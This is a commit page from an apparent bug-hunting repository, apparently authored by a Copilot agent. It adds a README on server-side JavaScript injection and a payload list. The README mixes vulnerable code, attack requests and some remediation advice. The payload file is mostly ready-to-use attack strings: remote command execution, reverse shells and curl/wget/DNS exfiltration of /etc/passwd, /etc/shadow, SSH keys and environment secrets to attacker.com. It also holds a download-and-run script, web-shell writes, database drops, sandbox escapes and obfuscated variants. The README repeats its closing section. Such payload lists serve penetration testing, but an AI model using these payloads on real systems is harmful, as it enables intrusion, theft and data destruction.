0x5t4l1n/hunting
1
0
Fork 0
mirror of https://github.com/0x5t4l1n/hunting.git synced 2026-05-26 19:36:33 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add timing attacks, Tor-based attacks, SSJI, symbolic link attacks, and enhanced auth bypass payloads

Browse Source 
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
This commit is contained in:
copilot-swe-agent[bot]
2026-01-05 15:54:35 +00:00
parent 5c4486169d
commit 1677a567e7
10 changed files with 4302 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
SSJI/README.md
+543
View File
@@ -0,0 +1,543 @@
# Server-Side JavaScript Injection (SSJI)
## Description
Server-Side JavaScript Injection (SSJI) is a vulnerability that occurs when user-controlled input is evaluated or executed as JavaScript code on the server side. This commonly affects Node.js applications, but can also impact other server-side JavaScript environments like MongoDB queries, ElectronJS applications, and server-side rendering frameworks.
## How SSJI Works
Unlike client-side XSS, SSJI executes JavaScript code on the server, potentially allowing attackers to:
- Execute arbitrary system commands
- Access server files and sensitive data
- Bypass authentication and authorization
- Manipulate database queries
- Achieve Remote Code Execution (RCE)
## Common Vulnerable Functions
### Node.js
- `eval()` - Directly evaluates JavaScript code
- `Function()` constructor - Creates and executes functions
- `setTimeout()/setInterval()` with string arguments
- `vm.runInNewContext()` without proper sandboxing
- `child_process.exec()` with unsanitized input
- Template engines (Handlebars, Pug, EJS) with unsafe rendering
### MongoDB
- `$where` operator - Evaluates JavaScript in queries
- `mapReduce()` - Can execute arbitrary JavaScript
- `$function` aggregation operator
## Common Attack Vectors
- User input fields
- JSON API parameters
- Template rendering
- MongoDB queries
- Configuration files
- Cookie values
- HTTP headers
- File upload metadata
- Server-side rendering (SSR)
## Testing Methodology & PoC Examples
### PoC 1: Basic eval() Injection
**Vulnerability:** User input passed directly to `eval()`.
**Vulnerable Code:**
```javascript
// Vulnerable Node.js code
app.get('/calculate', (req, res) => {
const result = eval(req.query.expression);
res.json({ result });
});
```
**Steps to Test:**
1. Identify input that might be evaluated
2. Test with mathematical expressions
3. Inject JavaScript code
**Request:**
```http
GET /calculate?expression=2+2 HTTP/1.1
Host: example.com
# Normal response: {"result": 4}
GET /calculate?expression=require('child_process').execSync('whoami').toString() HTTP/1.1
Host: example.com
# RCE: Returns username
```
**Payload Examples:**
```javascript
2+2
Math.random()
require('fs').readFileSync('/etc/passwd', 'utf8')
require('child_process').execSync('cat /etc/passwd').toString()
global.process.mainModule.require('child_process').execSync('id').toString()
```
---
### PoC 2: Function Constructor Injection
**Vulnerability:** Using Function constructor with user input.
**Vulnerable Code:**
```javascript
app.post('/execute', (req, res) => {
const fn = new Function('return ' + req.body.code);
const result = fn();
res.json({ result });
});
```
**Request:**
```http
POST /execute HTTP/1.1
Host: example.com
Content-Type: application/json
```
**Payloads:**
```javascript
require('fs').readFileSync('/etc/passwd', 'utf8')
process.env
global.process.mainModule.constructor._load('child_process').execSync('whoami').toString()
```
---
### PoC 3: MongoDB $where Injection
**Vulnerability:** User input in MongoDB `$where` queries.
**Vulnerable Code:**
```javascript
// Vulnerable MongoDB query
app.get('/users', async (req, res) => {
const users = await User.find({
$where: `this.username == '${req.query.username}'`
});
res.json(users);
});
```
**Request:**
```http
GET /users?username=admin' || '1'=='1 HTTP/1.1
Host: example.com
# Returns all users
GET /users?username=admin'; return true; // HTTP/1.1
Host: example.com
# Bypasses query, returns all users
```
**Payloads:**
```javascript
admin' || '1'=='1
'; return true; //
'; return this.password.match(/^a/); //
'; var http = require('http'); return true; //
'; db.users.drop(); return true; //
```
---
### PoC 4: Template Injection (Handlebars, Pug, EJS)
**Vulnerability:** Unsafe template rendering with user input.
**Vulnerable Handlebars Code:**
```javascript
const Handlebars = require('handlebars');
app.get('/greet', (req, res) => {
const template = Handlebars.compile('Hello {{name}}!');
const result = template({ name: req.query.name });
res.send(result);
});
```
**Handlebars SSJI Payloads:**
```handlebars
{{#with "s" as |string|}}
{{#with "e"}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return require('child_process').execSync('whoami');"}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}
```
**EJS Template Injection:**
```javascript
<%= global.process.mainModule.require('child_process').execSync('cat /etc/passwd') %>
<%= require('child_process').execSync('ls -la').toString() %>
```
**Pug Template Injection:**
```pug
#{global.process.mainModule.require('child_process').execSync('id')}
#{function(){return require('child_process').execSync('whoami')}()}
```
---
### PoC 5: vm.runInNewContext() Bypass
**Vulnerability:** Improper use of Node.js VM module.
**Vulnerable Code:**
```javascript
const vm = require('vm');
app.post('/execute', (req, res) => {
const sandbox = {};
const result = vm.runInNewContext(req.body.code, sandbox);
res.json({ result });
});
```
**Sandbox Escape Payloads:**
```javascript
this.constructor.constructor('return process')()
this.constructor.constructor('return global.process.mainModule.require("child_process").execSync("whoami").toString()')()
(function(){return this.constructor.constructor('return process')()})()
({}).constructor.constructor('return this.process.mainModule.require("child_process").execSync("id").toString()')()
```
---
### PoC 6: setTimeout/setInterval String Evaluation
**Vulnerability:** Using setTimeout/setInterval with string arguments.
**Vulnerable Code:**
```javascript
app.post('/schedule', (req, res) => {
setTimeout(req.body.callback, 1000);
res.json({ scheduled: true });
});
```
**Payloads:**
```javascript
require('child_process').exec('curl attacker.com/?data=$(cat /etc/passwd)')
require('fs').writeFileSync('/tmp/pwned', 'hacked')
global.process.exit(1)
```
---
### PoC 7: JSON.parse with Prototype Pollution
**Vulnerability:** Unsafe parsing leading to prototype pollution and code execution.
**Request:**
```http
POST /api/update HTTP/1.1
Host: example.com
Content-Type: application/json
```
---
### PoC 8: Express Server-Side Rendering
**Vulnerability:** Unsafe SSR with user-controlled templates.
**Vulnerable Code:**
```javascript
app.get('/render', (req, res) => {
res.render('template', {
userInput: req.query.input
});
});
```
**If template uses unsafe rendering:**
```
input=<%= global.process.mainModule.require('child_process').execSync('id') %>
```
---
### PoC 9: child_process with Unsanitized Input
**Vulnerability:** Command injection via child_process.
**Vulnerable Code:**
```javascript
const { exec } = require('child_process');
app.get('/ping', (req, res) => {
exec(`ping -c 4 ${req.query.host}`, (error, stdout) => {
res.send(stdout);
});
});
```
**Payloads:**
```bash
127.0.0.1; cat /etc/passwd
127.0.0.1 && whoami
127.0.0.1 | nc attacker.com 4444 -e /bin/bash
`curl attacker.com/?data=$(cat /etc/passwd)`
$(curl attacker.com/?data=$(whoami))
```
---
### PoC 10: MongoDB mapReduce Injection
**Vulnerability:** User input in MongoDB mapReduce operations.
**Vulnerable Code:**
```javascript
app.post('/aggregate', async (req, res) => {
const result = await User.mapReduce(
function() { eval(userInput); emit(this._id, 1); },
function(k, v) { return Array.sum(v); },
{ out: "result" }
);
});
```
**Payload:**
```javascript
db.users.find().forEach(function(user) {
db.stolen.insert(user);
});
```
---
## Exploitation Techniques
### 1. Remote Code Execution
```javascript
require('child_process').execSync('bash -i >& /dev/tcp/attacker.com/4444 0>&1')
require('child_process').spawn('nc', ['-e', '/bin/bash', 'attacker.com', '4444'])
```
### 2. File System Access
```javascript
require('fs').readFileSync('/etc/passwd', 'utf8')
require('fs').writeFileSync('/tmp/backdoor.js', 'malicious code')
require('fs').readdirSync('/').toString()
```
### 3. Environment Variable Exfiltration
```javascript
process.env
JSON.stringify(process.env)
```
### 4. Database Access
```javascript
require('mongoose').connection.db.admin().listDatabases()
```
### 5. Module Loading
```javascript
require('module')._load('child_process')
global.process.mainModule.require('fs')
```
## Tools for Testing
### 1. **Manual Testing with cURL**
```bash
curl "https://example.com/api?expr=require('os').userInfo()"
curl -X POST https://example.com/execute \
-H "Content-Type: application/json" \
-d '{"code":"global.process.mainModule.require(\"child_process\").execSync(\"id\").toString()"}'
```
### 2. **Burp Suite**
- Intercept requests
- Inject SSJI payloads in parameters
- Use Intruder for automated testing
### 3. **Custom Scripts**
```javascript
const axios = require('axios');
const payloads = [
'require("fs").readFileSync("/etc/passwd", "utf8")',
'require("child_process").execSync("whoami").toString()',
'global.process.mainModule.require("child_process").execSync("id").toString()'
];
for (const payload of payloads) {
axios.post('https://example.com/execute', {
code: payload
}).then(res => {
console.log(`Payload: ${payload}`);
console.log(`Result: ${res.data}`);
});
}
```
### 4. **MongoDB Testing**
```javascript
const MongoClient = require('mongodb').MongoClient;
// Test $where injection
db.users.find({
$where: "this.username == 'admin' || true"
});
```
## Exploitation Impact
- **Critical:** Remote Code Execution (RCE)
- **High:** Server compromise, data exfiltration
- **Sensitive Data Access:** Database credentials, environment variables, files
- **Denial of Service:** Process termination, resource exhaustion
- **Lateral Movement:** Access to internal networks
## Remediation
### 1. **Never Use eval() or Function()**
```javascript
// Bad
const result = eval(userInput);
// Good - Use safe alternatives
const result = math.evaluate(userInput); // Using math.js library
```
### 2. **Sanitize Input**
```javascript
// Validate and sanitize all user input
const validator = require('validator');
if (!validator.isNumeric(input)) {
throw new Error('Invalid input');
}
```
### 3. **Use Safe Alternatives**
```javascript
// Bad
exec(`command ${userInput}`);
// Good
execFile('command', [userInput]);
```
### 4. **Avoid $where in MongoDB**
```javascript
// Bad
User.find({ $where: `this.username == '${input}'` });
// Good
User.find({ username: input });
```
### 5. **Secure Template Rendering**
```javascript
// Use safe template rendering options
app.set('view options', {
allowProtoProperties: false,
allowProtoMethodsByDefault: false
});
```
### 6. **Input Validation**
```javascript
const Joi = require('joi');
const schema = Joi.object({
expression: Joi.string().regex(/^[0-9+\-*/() ]+$/)
});
const { error, value } = schema.validate(req.body);
```
### 7. **Least Privilege**
- Run Node.js with minimal permissions
- Use containers with restricted capabilities
- Implement proper file system permissions
### 8. **Content Security Policy**
```javascript
app.use(helmet.contentSecurityPolicy({
directives: {
defaultSrc: ["'self'"],
scriptSrc: ["'self'"]
}
}));
```
### 9. **Disable Dangerous Features**
```javascript
// Disable eval in strict mode
'use strict';
// Use VM2 instead of vm for better sandboxing
const { VM } = require('vm2');
const vm = new VM({
timeout: 1000,
sandbox: {}
});
```
### 10. **Security Auditing**
- Regular code reviews
- Use linters (ESLint with security plugins)
- Dependency scanning (npm audit, Snyk)
- Penetration testing
## Detection and Monitoring
### 1. **Log Suspicious Activity**
```javascript
// Log eval usage
const originalEval = eval;
eval = function(...args) {
logger.warn('eval() called', { args });
return originalEval(...args);
};
```
### 2. **Monitor System Calls**
- Watch for unexpected child processes
- Monitor file system access
- Track network connections
### 3. **Runtime Protection**
```javascript
// Freeze dangerous globals
Object.freeze(require);
Object.freeze(global);
```
## References
- [OWASP - Server-Side JavaScript Injection](https://owasp.org/www-community/attacks/Server-Side_Includes_(SSI)_Injection)
- [Node.js Security Best Practices](https://nodejs.org/en/docs/guides/security/)
- [MongoDB Security Checklist](https://docs.mongodb.com/manual/administration/security-checklist/)
- [Avoiding eval and new Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval#never_use_eval!)
## Payloads
See `ssji-payloads.txt` for a comprehensive list of SSJI payloads and injection techniques.
- [Node.js Security Best Practices](https://nodejs.org/en/docs/guides/security/)
- [MongoDB Security Checklist](https://docs.mongodb.com/manual/administration/security-checklist/)
- [Avoiding eval and new Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval#never_use_eval!)
## Payloads
See `ssji-payloads.txt` for a comprehensive list of SSJI payloads and injection techniques.
SSJI/ssji-payloads.txt
+411
View File
@@ -0,0 +1,411 @@
# Server-Side JavaScript Injection (SSJI) Payloads
# ============================================
# 1. BASIC eval() INJECTION
# ============================================
# Simple expressions
2+2
Math.random()
Date.now()
JSON.stringify({})
# Information disclosure
process.version
process.platform
process.arch
process.pid
process.cwd()
process.env
global
this
# File system access
require('fs').readFileSync('/etc/passwd', 'utf8')
require('fs').readFileSync('/etc/shadow', 'utf8')
require('fs').readFileSync('/proc/self/environ', 'utf8')
require('fs').readdirSync('/').toString()
require('fs').readdirSync('/home').toString()
require('fs').readFileSync('package.json', 'utf8')
require('fs').readFileSync('.env', 'utf8')
# ============================================
# 2. REMOTE CODE EXECUTION (RCE)
# ============================================
# Basic command execution
require('child_process').execSync('whoami').toString()
require('child_process').execSync('id').toString()
require('child_process').execSync('pwd').toString()
require('child_process').execSync('ls -la').toString()
require('child_process').execSync('cat /etc/passwd').toString()
require('child_process').execSync('uname -a').toString()
# Reverse shell
require('child_process').exec('bash -i >& /dev/tcp/attacker.com/4444 0>&1')
require('child_process').exec('nc -e /bin/bash attacker.com 4444')
require('child_process').spawn('nc', ['-e', '/bin/bash', 'attacker.com', '4444'])
# Data exfiltration
require('child_process').execSync('curl attacker.com/?data=$(cat /etc/passwd|base64)').toString()
require('child_process').execSync('wget --post-file=/etc/passwd attacker.com').toString()
# Write backdoor
require('fs').writeFileSync('/tmp/backdoor.js', 'malicious code')
require('fs').writeFileSync('shell.php', '<?php system($_GET["cmd"]); ?>')
# ============================================
# 3. FUNCTION CONSTRUCTOR INJECTION
# ============================================
# Basic Function constructor
new Function('return 2+2')()
new Function('return process.version')()
new Function('return require("os").userInfo()')()
# RCE via Function constructor
new Function('return require("child_process").execSync("whoami").toString()')()
new Function('return global.process.mainModule.require("child_process").execSync("id").toString()')()
# ============================================
# 4. MONGODB $where INJECTION
# ============================================
# Basic MongoDB injection
admin' || '1'=='1
' || true || '
' || '1'=='1' || '
'; return true; //
admin'; return true; //
# MongoDB data exfiltration
'; return this.password.match(/^a/); //
'; return this.email.includes("admin"); //
'; return this.role == "admin"; //
# MongoDB enumeration
'; var users = db.users.find(); return true; //
'; db.users.find().forEach(function(u){print(u)}); return true; //
# MongoDB command execution (if possible)
'; require('child_process').execSync('whoami'); return true; //
'; var fs = require('fs'); fs.readFileSync('/etc/passwd'); return true; //
# MongoDB DoS
'; while(true){}; //
'; db.users.drop(); return true; //
'; db.dropDatabase(); return true; //
# ============================================
# 5. TEMPLATE INJECTION (HANDLEBARS)
# ============================================
# Handlebars RCE
{{#with "s" as |string|}}
{{#with "e"}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return require('child_process').execSync('whoami');"}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}
# Simplified Handlebars payload
{{this}}
{{this.constructor}}
{{this.constructor.constructor}}
# ============================================
# 6. EJS TEMPLATE INJECTION
# ============================================
<%= global.process.mainModule.require('child_process').execSync('whoami') %>
<%= require('child_process').execSync('cat /etc/passwd').toString() %>
<%= global.process.mainModule.require('fs').readFileSync('/etc/passwd', 'utf8') %>
<%= process.env %>
<%= JSON.stringify(process.env) %>
# ============================================
# 7. PUG/JADE TEMPLATE INJECTION
# ============================================
#{global.process.mainModule.require('child_process').execSync('id')}
#{function(){return require('child_process').execSync('whoami')}()}
#{require('child_process').execSync('cat /etc/passwd').toString()}
- var x = global.process.mainModule.require('child_process').execSync('ls').toString()
= x
# ============================================
# 8. VM SANDBOX ESCAPE
# ============================================
# Constructor chain escape
this.constructor.constructor('return process')()
this.constructor.constructor('return global')()
({}).constructor.constructor('return this')()
# Process access
this.constructor.constructor('return process')().mainModule.require('child_process').execSync('whoami').toString()
(function(){return this.constructor.constructor('return process')()})()
({}).constructor.constructor('return global.process.mainModule.require("child_process").execSync("id").toString()')()
# Alternative escapes
(function(){return this})().constructor.constructor('return process')()
arguments.callee.caller.constructor('return process')()
# ============================================
# 9. PROTOTYPE POLLUTION TO RCE
# ============================================
# Prototype pollution
{"__proto__": {"isAdmin": true}}
{"__proto__": {"polluted": "yes"}}
{"constructor": {"prototype": {"isAdmin": true}}}
# Pollution leading to RCE
{"__proto__": {"toString": "require('child_process').execSync('whoami').toString()"}}
{"__proto__": {"valueOf": "require('child_process').execSync('id')"}}
# ============================================
# 10. SETTIMEOUT/SETINTERVAL INJECTION
# ============================================
require('child_process').exec('curl attacker.com/?data=$(whoami)')
require('fs').writeFileSync('/tmp/pwned', 'hacked')
require('child_process').execSync('nc attacker.com 4444 -e /bin/bash')
global.process.exit(1)
# ============================================
# 11. REQUIRE VARIATIONS
# ============================================
# Direct require
require('child_process')
require('fs')
require('net')
require('http')
# Global require
global.require('child_process')
global.process.mainModule.require('child_process')
# Module constructor
process.mainModule.constructor._load('child_process')
global.process.mainModule.constructor._load('fs')
# ============================================
# 12. ENVIRONMENT VARIABLE EXFILTRATION
# ============================================
process.env
JSON.stringify(process.env)
process.env.PATH
process.env.HOME
process.env.USER
process.env.SECRET_KEY
process.env.DATABASE_URL
process.env.API_KEY
# ============================================
# 13. FILE READ VARIATIONS
# ============================================
# Read sensitive files
require('fs').readFileSync('/etc/passwd', 'utf8')
require('fs').readFileSync('/etc/shadow', 'utf8')
require('fs').readFileSync('/etc/hosts', 'utf8')
require('fs').readFileSync('/proc/self/environ', 'utf8')
require('fs').readFileSync('/home/user/.ssh/id_rsa', 'utf8')
require('fs').readFileSync('config/database.yml', 'utf8')
require('fs').readFileSync('.env', 'utf8')
require('fs').readFileSync('package.json', 'utf8')
# Directory listing
require('fs').readdirSync('/').toString()
require('fs').readdirSync('/etc').toString()
require('fs').readdirSync('/home').toString()
require('fs').readdirSync('.').toString()
# ============================================
# 14. COMMAND INJECTION VIA CHILD_PROCESS
# ============================================
# exec variations
require('child_process').exec('cat /etc/passwd', (e,o)=>console.log(o))
require('child_process').execSync('whoami').toString()
require('child_process').execFileSync('ls', ['-la']).toString()
# spawn variations
require('child_process').spawn('cat', ['/etc/passwd'])
require('child_process').spawnSync('id').stdout.toString()
# ============================================
# 15. NETWORK OPERATIONS
# ============================================
# HTTP request
require('http').get('http://attacker.com/?data=exfiltrated')
require('https').get('https://attacker.com/?data=' + process.env.SECRET)
# DNS exfiltration
require('dns').resolve4(process.env.SECRET + '.attacker.com')
# Socket connection
require('net').connect(4444, 'attacker.com')
# ============================================
# 16. PROCESS MANIPULATION
# ============================================
process.exit(1)
process.kill(process.pid)
process.chdir('/')
process.binding('spawn_sync')
# ============================================
# 17. CRYPTO MODULE ACCESS
# ============================================
require('crypto').randomBytes(16).toString('hex')
require('crypto').getHashes()
require('crypto').getCiphers()
# ============================================
# 18. OS MODULE ACCESS
# ============================================
require('os').userInfo()
require('os').hostname()
require('os').platform()
require('os').arch()
require('os').cpus()
require('os').networkInterfaces()
require('os').tmpdir()
require('os').homedir()
# ============================================
# 19. PATH MODULE FOR TRAVERSAL
# ============================================
require('path').resolve('/etc/passwd')
require('path').join(__dirname, '../../../etc/passwd')
# ============================================
# 20. MONGODB SPECIFIC INJECTIONS
# ============================================
# $function aggregation (MongoDB 4.4+)
{$function: {
body: function() { return require('child_process').execSync('whoami').toString(); },
args: [],
lang: "js"
}}
# mapReduce injection
{
map: function() { require('child_process').exec('curl attacker.com/?data=pwned'); emit(this._id, 1); },
reduce: function(k, v) { return Array.sum(v); }
}
# ============================================
# 21. EXPRESS SPECIFIC
# ============================================
# res.render with unsafe data
<%= user.input %>
#{user.input}
{{user.input}}
# ============================================
# 22. WEBPACK/BUNDLER SPECIFIC
# ============================================
__webpack_require__
__non_webpack_require__
# ============================================
# 23. ELECTRON SPECIFIC
# ============================================
require('electron').remote.require('child_process')
require('electron').ipcRenderer.send('exploit')
# ============================================
# 24. OBFUSCATED PAYLOADS
# ============================================
# String concatenation
req+'uire'('child_'+'process').exec('whoami')
# Unicode escaping
require('\u0063\u0068\u0069\u006c\u0064\u005f\u0070\u0072\u006f\u0063\u0065\u0073\u0073')
# Hex encoding
require(Buffer.from('6368696c645f70726f63657373', 'hex').toString())
# Base64
require(Buffer.from('Y2hpbGRfcHJvY2Vzcw==', 'base64').toString())
# Computed property access
global['pro'+'cess'].mainModule['req'+'uire']('child_process')
# ============================================
# 25. NESTING AND CHAINING
# ============================================
require('child_process').exec('wget http://attacker.com/shell.sh -O /tmp/s.sh && bash /tmp/s.sh')
require('child_process').execSync('curl attacker.com/$(cat /etc/passwd | base64)').toString()
# ============================================
# 26. TIME-BASED BLIND SSJI
# ============================================
require('child_process').execSync('sleep 5')
setTimeout(function(){}, 5000)
require('child_process').execSync('ping -c 5 attacker.com')
# ============================================
# 27. OUT-OF-BAND DATA EXFILTRATION
# ============================================
require('child_process').execSync('curl attacker.com -d "$(cat /etc/passwd)"')
require('child_process').execSync('wget --post-data="$(env)" attacker.com')
require('child_process').execSync('nslookup $(whoami).attacker.com')
# ============================================
# 28. WRITESTREAM FOR PERSISTENCE
# ============================================
require('fs').createWriteStream('/tmp/backdoor.js').write('malicious code')
# ============================================
# 29. REGEX DOS (ReDoS) via SSJI
# ============================================
/(a+)+b/.test('aaaaaaaaaaaaaaaaaaaaaa!')
/(a|a)*b/.test('aaaaaaaaaaaaaaaaaaaaaa!')
# ============================================
# 30. TESTING PAYLOADS
# ============================================
# Detection payloads
throw new Error('SSJI Test')
console.log('SSJI_TEST_' + Date.now())
require('fs').writeFileSync('/tmp/ssji_test_' + Date.now(), 'test')
# Simple arithmetic to confirm execution
7*7
Math.sqrt(16)
[1,2,3].join(',')